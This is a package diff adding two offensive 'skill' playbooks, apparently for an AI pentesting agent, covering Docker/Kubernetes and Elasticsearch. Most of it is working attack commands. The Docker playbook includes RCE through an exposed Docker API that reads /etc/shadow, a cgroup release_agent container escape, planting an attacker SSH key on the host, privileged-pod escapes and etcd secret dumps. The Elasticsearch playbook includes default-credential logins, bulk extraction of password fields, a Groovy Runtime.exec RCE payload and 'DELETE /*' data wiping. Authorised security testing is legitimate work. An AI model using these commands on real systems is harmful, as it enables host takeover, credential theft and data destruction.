@aegis-scan/skills 0.5.0 → 0.5.2

package/skills/offensive/airecon-fork/technologies-docker-container/SKILL.md

@@ -0,0 +1,266 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: docker-container
+description: Security testing playbook for Docker and container environments covering container escape, privileged containers, exposed Docker API, misconfigurations, and Kubernetes enumeration
+---
+
+# Docker / Container Security Testing
+
+Containers are frequently misconfigured in production. Attack surface: exposed Docker daemon API (direct RCE), privileged container escape, mounted host paths, weak seccomp/AppArmor, and Kubernetes RBAC misconfigurations.
+
+---
+
+## Reconnaissance
+
+### Discovery
+
+    # Port scanning for Docker/container services
+    nmap -p 2375,2376,4243,8080,8443,10250,10255,6443,2379 <target> -sV --open
+
+    # Ports:
+    # 2375  — Docker daemon (HTTP, no TLS — CRITICAL if exposed)
+    # 2376  — Docker daemon (HTTPS with TLS)
+    # 4243  — Alternate Docker daemon
+    # 10250 — Kubernetes kubelet API
+    # 10255 — Kubernetes kubelet read-only
+    # 6443  — Kubernetes API server
+    # 2379  — etcd (Kubernetes state store)
+
+---
+
+## Exposed Docker API (Remote Code Execution)
+
+Docker API on port 2375 with no TLS = instant RCE:
+
+    # Test connection
+    curl http://<target>:2375/version
+    curl http://<target>:2375/info
+
+    # List containers
+    curl http://<target>:2375/containers/json
+    curl http://<target>:2375/containers/json?all=true
+
+    # List images
+    curl http://<target>:2375/images/json
+
+    # RCE: Create and run a privileged container mounting host filesystem
+    curl -X POST http://<target>:2375/containers/create \
+      -H "Content-Type: application/json" \
+      -d '{
+        "Image": "alpine",
+        "Cmd": ["chroot", "/host", "bash", "-c", "id && cat /etc/shadow"],
+        "HostConfig": {
+          "Binds": ["/:/host"],
+          "Privileged": true
+        }
+      }' | python3 -m json.tool
+
+    # Start the container (replace <id> with returned container ID):
+    curl -X POST http://<target>:2375/containers/<id>/start
+
+    # Get output (attach to container logs):
+    curl http://<target>:2375/containers/<id>/logs?stdout=true
+
+    # Using Docker CLI directly:
+    docker -H tcp://<target>:2375 run -it --privileged --pid=host alpine nsenter -t 1 -m -u -n -i sh
+
+---
+
+## Container Escape Techniques
+
+### Privileged Container Escape
+
+    # Check if running in privileged container:
+    cat /proc/1/status | grep CapEff
+    # CapEff: 0000003fffffffff = full capabilities = privileged
+
+    # Mount host filesystem via cgroup:
+    mkdir /tmp/cgroup && mount -t cgroup -o memory none /tmp/cgroup
+    mkdir /tmp/cgroup/x
+    echo 1 > /tmp/cgroup/x/notify_on_release
+    host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
+    echo "$host_path/cmd" > /tmp/cgroup/release_agent
+    echo "#!/bin/sh" > /cmd
+    echo "id > $host_path/output" >> /cmd
+    chmod a+x /cmd
+    sh -c "echo \$\$ > /tmp/cgroup/x/cgroup.procs"
+    cat /output
+
+    # Mount host device (privileged):
+    fdisk -l                        # Find host disk (usually /dev/sda1 or /dev/xvda1)
+    mkdir /host
+    mount /dev/sda1 /host
+    cat /host/etc/shadow            # Host password hashes
+
+    # Add SSH key to host root:
+    echo "ssh-rsa AAAA... attacker" >> /host/root/.ssh/authorized_keys
+
+### Escape via Mounted Docker Socket
+
+    # Check if Docker socket is mounted in container:
+    ls -la /var/run/docker.sock
+    # If exists = full Docker control = host escape
+
+    # Use socket to spawn host-privileged container:
+    docker -H unix:///var/run/docker.sock run -it --privileged \
+      --pid=host --ipc=host --net=host \
+      -v /:/host alpine chroot /host
+
+    # Or install docker client first:
+    apt-get install -y docker.io || apk add docker
+    docker -H unix:///var/run/docker.sock ps
+
+### Escape via Kernel Vulnerabilities
+
+    # Check kernel version for known exploits:
+    uname -r
+    # Notable container escape CVEs:
+    # CVE-2022-0847 (DirtyPipe) — Kernel 5.8-5.16.11
+    # CVE-2019-5736 (runc) — Overwrite runc binary
+    # CVE-2019-14271 (Docker) — Shared library injection
+
+    # runc escape (CVE-2019-5736):
+    # Overwrite /proc/self/exe during exec → overwrites host runc binary
+    # Tools: https://github.com/Frichetten/CVE-2019-5736-PoC
+
+---
+
+## Container Enumeration (From Inside)
+
+    # Detect if inside a container
+    cat /proc/1/cgroup | grep -i docker
+    cat /.dockerenv                     # File exists = Docker container
+    ls -la /run/.containerenv          # Podman indicator
+
+    # Environment variables (may contain secrets)
+    env | grep -iE "key|token|secret|password|pass|api|db|url"
+    cat /proc/1/environ | tr '\0' '\n' | grep -iE "key|token|secret|password"
+
+    # Mounted secrets
+    find / -name "*.key" -o -name "*.pem" -o -name "secrets" 2>/dev/null
+    cat /run/secrets/*                  # Docker Swarm secrets
+    ls /var/run/secrets/kubernetes.io/serviceaccount/   # Kubernetes SA token
+
+    # Network neighbors (other containers)
+    ip route                           # Subnet reveals container network
+    cat /etc/hosts                     # Other containers
+    nmap -sn <container_subnet>/24    # Scan container network
+
+---
+
+## Kubernetes Attacks (From Within a Pod)
+
+### Service Account Token Exploitation
+
+    # Default SA token mounted at:
+    TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
+    NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
+    CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
+
+    # Query K8s API:
+    curl -s https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods \
+      -H "Authorization: Bearer $TOKEN" --cacert $CACERT
+
+    # Check permissions:
+    curl -s https://kubernetes.default.svc/apis/authorization.k8s.io/v1/selfsubjectaccessreviews \
+      -H "Authorization: Bearer $TOKEN" --cacert $CACERT \
+      -H "Content-Type: application/json" -d '
+    {"apiVersion":"authorization.k8s.io/v1","kind":"SelfSubjectAccessReview",
+     "spec":{"resourceAttributes":{"verb":"list","resource":"pods"}}}'
+
+    # Using kubectl:
+    kubectl --token=$TOKEN --certificate-authority=$CACERT \
+      -s https://kubernetes.default.svc auth can-i --list
+
+### Kubernetes Privilege Escalation
+
+    # Create privileged pod to escape to host:
+    kubectl --token=$TOKEN apply -f - <<EOF
+    apiVersion: v1
+    kind: Pod
+    metadata:
+      name: escape
+    spec:
+      hostPID: true
+      hostNetwork: true
+      containers:
+      - name: escape
+        image: alpine
+        command: ["nsenter", "--mount=/proc/1/ns/mnt", "--", "sh"]
+        securityContext:
+          privileged: true
+    EOF
+
+    # Access pod:
+    kubectl --token=$TOKEN exec -it escape -- sh
+
+---
+
+## Kubernetes External API Attacks
+
+    # Anonymous access to Kubernetes API:
+    curl -sk https://<k8s-api>:6443/api/v1/namespaces/default/pods
+    curl -sk https://<k8s-api>:6443/version
+
+    # Kubelet read-only API (port 10255):
+    curl http://<node>:10255/pods          # Lists all pods (no auth!)
+    curl http://<node>:10255/stats/summary
+
+    # Kubelet API (port 10250):
+    curl -sk https://<node>:10250/pods
+    # Run command on pod (if anonymous allowed):
+    curl -sk https://<node>:10250/run/<namespace>/<pod>/<container> \
+      -d "cmd=id"
+
+    # etcd access (port 2379):
+    etcdctl --endpoints=http://<target>:2379 get / --prefix --keys-only
+    etcdctl --endpoints=http://<target>:2379 get /registry/secrets --prefix
+    # Contains Kubernetes secrets in base64!
+
+---
+
+## Docker Compose / Config File Exposure
+
+    # Look for exposed Docker configuration:
+    GET /docker-compose.yml
+    GET /docker-compose.yaml
+    GET /.docker/config.json      # Registry credentials!
+    GET /Dockerfile
+
+    # Registry credentials in config.json:
+    cat ~/.docker/config.json
+    # Contains base64-encoded registry auth credentials
+
+---
+
+## Container Image Analysis
+
+    # Pull and analyze image locally:
+    docker pull <image>:<tag>
+    docker history <image>:<tag>      # Layer commands (may reveal secrets added then deleted)
+    docker inspect <image>:<tag>      # Env vars, exposed ports, volumes
+
+    # Extract image filesystem:
+    docker save <image> | tar -xf - -C /tmp/image_layers/
+    find /tmp/image_layers/ -name "*.tar" -exec tar -tf {} \; | grep -iE "password|secret|key"
+
+    # Tools for image scanning:
+    trivy image <image>:<tag>                 # CVE + secret scanning
+    trufflehog docker --image <image>         # Secret scanning in image history
+
+---
+
+## Pro Tips
+
+1. Docker daemon on port 2375 (no TLS) = instant host takeover — always check first
+2. Mounted Docker socket (`/var/run/docker.sock`) inside a container = full host escape
+3. `cat /proc/1/environ` reveals environment variables including secrets
+4. Kubernetes pod default SA token + `list pods` permission → cluster-wide enumeration
+5. Kubelet read-only API (port 10255) often accessible without auth — lists all pods
+6. etcd on port 2379 without TLS = all Kubernetes secrets in plaintext
+7. `docker history` reveals sensitive data in layers even if files were deleted in later layers
+
+## Summary
+
+Container testing = Docker API on 2375 (no TLS) → instant RCE + privileged container escape via `/dev/sda` mount + Docker socket mount → host escape. Inside K8s pods: service account token → API enumeration → privileged pod creation → host escape. etcd exposure is often overlooked but contains all cluster secrets in base64. Always scan the container subnet for other accessible services after initial access.

package/skills/offensive/airecon-fork/technologies-elasticsearch/SKILL.md

@@ -0,0 +1,226 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: elasticsearch
+description: Security testing playbook for Elasticsearch covering unauthenticated access, data extraction, index enumeration, and Kibana security misconfigurations
+---
+
+# Elasticsearch Security Testing
+
+Elasticsearch is notorious for misconfigured public access — billions of records have been exposed via open Elasticsearch instances. Attack surface: no authentication by default (old versions), full data extraction, Kibana admin access, and Groovy/Painless script injection.
+
+---
+
+## Reconnaissance
+
+### Discovery
+
+    # Port scanning
+    nmap -p 9200,9300,5601 <target> -sV --open
+
+    # Ports:
+    # 9200  — Elasticsearch REST API (HTTP)
+    # 9300  — Elasticsearch transport/cluster
+    # 5601  — Kibana web interface
+
+    # Shodan dorking:
+    port:9200 elasticsearch
+    product:"Elastic" port:9200
+
+---
+
+## Unauthenticated Access Check
+
+    # Basic cluster info — if this works, no auth required
+    curl -s http://<target>:9200/
+    # Returns: cluster name, version, cluster UUID
+
+    # Health check
+    curl -s http://<target>:9200/_cluster/health?pretty
+
+    # If auth required (Elasticsearch 8.x default):
+    curl -u elastic:changeme http://<target>:9200/
+    curl -u elastic:elastic http://<target>:9200/
+    curl -u admin:admin http://<target>:9200/
+
+---
+
+## Index Enumeration
+
+    # List all indices
+    curl -s http://<target>:9200/_cat/indices?v
+    curl -s http://<target>:9200/_cat/indices?h=index,docs.count,store.size
+
+    # List indices matching pattern
+    curl -s "http://<target>:9200/_cat/indices/user*?v"
+    curl -s "http://<target>:9200/_cat/indices/log*?v"
+
+    # High-value index names to look for:
+    # users, accounts, customers, employees, orders, payments, credentials
+    # logs, audit, access_log, firewall, siem
+    # emails, messages, documents, files
+
+    # Count documents in an index
+    curl -s "http://<target>:9200/<index>/_count"
+
+---
+
+## Data Extraction
+
+    # Get index mapping (field names and types — reveals schema)
+    curl -s "http://<target>:9200/<index>/_mapping?pretty"
+
+    # Get first 10 documents
+    curl -s "http://<target>:9200/<index>/_search?pretty&size=10"
+
+    # Get all documents (scroll for large indices):
+    curl -s "http://<target>:9200/<index>/_search?size=10000&pretty"
+
+    # Search for sensitive keywords across all indices:
+    curl -s 'http://<target>:9200/_all/_search?q=password&pretty'
+    curl -s 'http://<target>:9200/_all/_search?q=secret&pretty'
+    curl -s 'http://<target>:9200/_all/_search?q=apikey&pretty'
+
+    # Get a specific document by ID:
+    curl -s "http://<target>:9200/<index>/_doc/<id>?pretty"
+
+    # Get specific fields only:
+    curl -s "http://<target>:9200/<index>/_search?pretty" -d '
+    {
+      "_source": ["username", "email", "password"],
+      "query": {"match_all": {}}
+    }'
+
+---
+
+## Cluster Information Disclosure
+
+    # Cluster settings (may reveal auth/TLS config)
+    curl -s "http://<target>:9200/_cluster/settings?pretty&include_defaults=true"
+
+    # Node info (OS, JVM, network details)
+    curl -s "http://<target>:9200/_nodes?pretty"
+    curl -s "http://<target>:9200/_nodes/stats?pretty"
+
+    # Shard allocation
+    curl -s "http://<target>:9200/_cat/shards?v"
+
+    # Pending tasks
+    curl -s "http://<target>:9200/_cluster/pending_tasks?pretty"
+
+    # Ingest pipelines (may contain credentials/endpoints)
+    curl -s "http://<target>:9200/_ingest/pipeline?pretty"
+
+    # Snapshots (backups — may be restorable)
+    curl -s "http://<target>:9200/_snapshot?pretty"
+    curl -s "http://<target>:9200/_snapshot/<repo>/_all?pretty"
+
+---
+
+## Kibana Exposure
+
+    # Kibana web interface
+    GET http://<target>:5601/
+
+    # Kibana default credentials:
+    elastic:changeme    (ES 5.x/6.x)
+    elastic:elastic
+    kibana:kibana
+
+    # Kibana API (useful when Kibana is accessible):
+    GET http://<target>:5601/api/status                    # Kibana version + status
+    GET http://<target>:5601/api/saved_objects/_find?type=dashboard&per_page=100
+    GET http://<target>:5601/api/saved_objects/_find?type=index-pattern
+
+    # Kibana console (execute Elasticsearch queries directly):
+    POST http://<target>:5601/api/console/proxy?path=/_cat/indices&method=GET
+
+---
+
+## Script Injection (Painless / Groovy)
+
+Elasticsearch allows scripted queries — if user input reaches script context:
+
+    # Painless script injection (Elasticsearch 5+):
+    {
+      "script": {
+        "lang": "painless",
+        "source": "Math.max(params.a, params.b)",
+        "params": {"a": 1, "b": 2}
+      }
+    }
+
+    # RCE attempts (sandboxed in modern ES, but test older versions):
+    # Groovy (Elasticsearch 1.x/2.x — NOT sandboxed):
+    curl -X POST "http://<target>:9200/_search" -d '
+    {
+      "size": 1,
+      "query": {
+        "filtered": {
+          "query": {
+            "match_all": {}
+          }
+        }
+      },
+      "script_fields": {
+        "my_field": {
+          "script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getMethod(\"exec\",\"a string\".getClass()).invoke(java.lang.Math.class.forName(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null),\"id\")"
+        }
+      }
+    }'
+
+    # CVE-2014-3120 / CVE-2015-1427: Groovy sandbox escape → RCE
+    nuclei -t cves/2014/CVE-2014-3120.yaml -u http://<target>:9200/
+
+---
+
+## Data Destruction / Modification
+
+    # Delete an index (if write access)
+    curl -X DELETE "http://<target>:9200/<index>"
+
+    # Delete all data
+    curl -X DELETE "http://<target>:9200/*"     # DESTRUCTIVE — confirm scope
+
+    # Create/modify document (unauthorized write access):
+    curl -X PUT "http://<target>:9200/<index>/_doc/1" -H 'Content-Type: application/json' -d '
+    {"modified": "by attacker"}'
+
+---
+
+## Automated Scanning
+
+    # esearch / elasticsearch-dump for bulk extraction
+    elasticdump --input=http://<target>:9200/<index> --output=output/es_data.json --type=data
+
+    # nuclei templates for ES:
+    nuclei -t exposures/apis/elasticsearch.yaml -u http://<target>:9200/
+    nuclei -t cves/ -tags elasticsearch -u http://<target>:9200/
+
+    # Automated ES scanner:
+    python3 -c "
+    import requests, json
+    base = 'http://<target>:9200'
+    indices = requests.get(f'{base}/_cat/indices?format=json').json()
+    for idx in indices:
+        name = idx['index']
+        count = idx.get('docs.count', 0)
+        size = idx.get('store.size', '0')
+        print(f'{name}: {count} docs, {size}')
+    "
+
+---
+
+## Pro Tips
+
+1. Elasticsearch 7.x and below have no authentication by default — check immediately
+2. List indices first (`_cat/indices?v`) to identify the most valuable data before extracting
+3. Search for sensitive keywords across all indices: `_all/_search?q=password`
+4. Kibana on port 5601 often has weaker security than the ES API itself
+5. Ingest pipelines may contain webhook URLs, credentials, or API keys
+6. Snapshot repositories may point to S3 buckets — check for accessible backup files
+7. Groovy scripting (ES 1.x/2.x) is completely unprotected — immediate RCE
+
+## Summary
+
+Elasticsearch testing = unauthenticated access check + `_cat/indices` listing + targeted data extraction via `_search`. Open Elasticsearch instances are the most common cause of massive data breaches. Always enumerate indices by name, extract mappings to understand the schema, then target sensitive indices (users, payments, logs). Search for `password`, `secret`, `token` across all indices with `_all/_search?q=password`.